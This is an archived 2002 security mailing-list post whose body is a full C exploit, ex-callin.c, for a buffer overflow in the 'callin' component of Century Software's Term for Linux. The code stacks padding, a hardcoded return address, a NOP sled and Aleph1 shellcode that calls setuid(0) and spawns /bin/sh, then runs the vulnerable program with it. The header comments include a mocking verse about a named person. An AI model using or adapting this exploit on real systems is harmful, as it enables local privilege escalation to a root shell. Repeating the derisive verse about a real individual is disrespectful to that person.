Century Software Term Exploit

From: haikuat_private
Date: Tue Feb 26 2002 - 16:13:58 PST

Next message: saabstoryat_private: "Re: Symantec LiveUpdate"

Previous message: Peter Mell: "Last Call for Papers - RAID 2002"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/********************************************************/
/* ex-callin.c - Haiku Hacker <haikuat_private>      */
/* Exploits the buffer overflow in Century Software's   */
/* calling component of the Term program for Linux.     */
/********************************************************/
/* Greets, love, and respect to:                        */
/* KF, Merc, Synapse, UPT old and new, Lance Spitzner,  */
/* egami, comega, jericho, and most importantly sl1k    */
/* for his guidance, coaching, and tutoring.            */
/********************************************************/
/* RFP's Pants                                          */
/* -----------                                          */
/* Rain Forest Puppy                                    */
/* Wears tight black pants to big cons                  */
/* Does he have limp wrist?                             */
/********************************************************/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* use this to specify the location of callin */
#define CINPATH "./callin"


int main(int argc, char **argv)
{
        /* Shellcode borrowed from Aleph1 */
        char shellcode[] =
                "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
                "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
                "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
                "\xff\xff/bin/sh";

        char egg_string[300];
        int i;
        unsigned long offset = 0;

        if (argc > 1)
        {
                offset = atoi(argv[1]);
        }

        memcpy(egg_string, "tty", 3);

        for (i = 3; i < 95; i++)
                egg_string[i] = 'A';

        *(long *)(egg_string+95) = 0xbffff67c + offset;

        for (i = 99; i < 300; i++)
                egg_string[i] = 0x90;

        strcpy(egg_string+(sizeof(egg_string)-strlen(shellcode)), shellcode);

        execl(CINPATH, "callin", egg_string, 0);
}

Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wloEARECABoFAjx8JGETHGhhaWt1QGh1c2htYWlsLmNvbQAKCRDCt+udg2XXB76gAKC/
O3RRCP2I5/7hFZ2bc1cv2cFI8QCaA7WqeVfOdKd+rITrhPqQsyoM74Y=
=duZ2
-----END PGP SIGNATURE-----

Next message: saabstoryat_private: "Re: Symantec LiveUpdate"
Previous message: Peter Mell: "Last Call for Papers - RAID 2002"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 19:05:25 PST